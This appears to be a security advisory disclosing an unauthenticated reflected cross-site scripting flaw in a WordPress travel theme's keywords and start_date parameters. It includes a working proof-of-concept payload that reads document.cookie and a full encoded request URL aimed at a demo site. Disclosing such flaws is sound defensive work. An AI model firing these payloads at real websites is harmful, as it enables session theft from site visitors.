Goto - Tour & Travel < 2.0 - Unauthenticated Reflected XSS

Description

The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>



https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13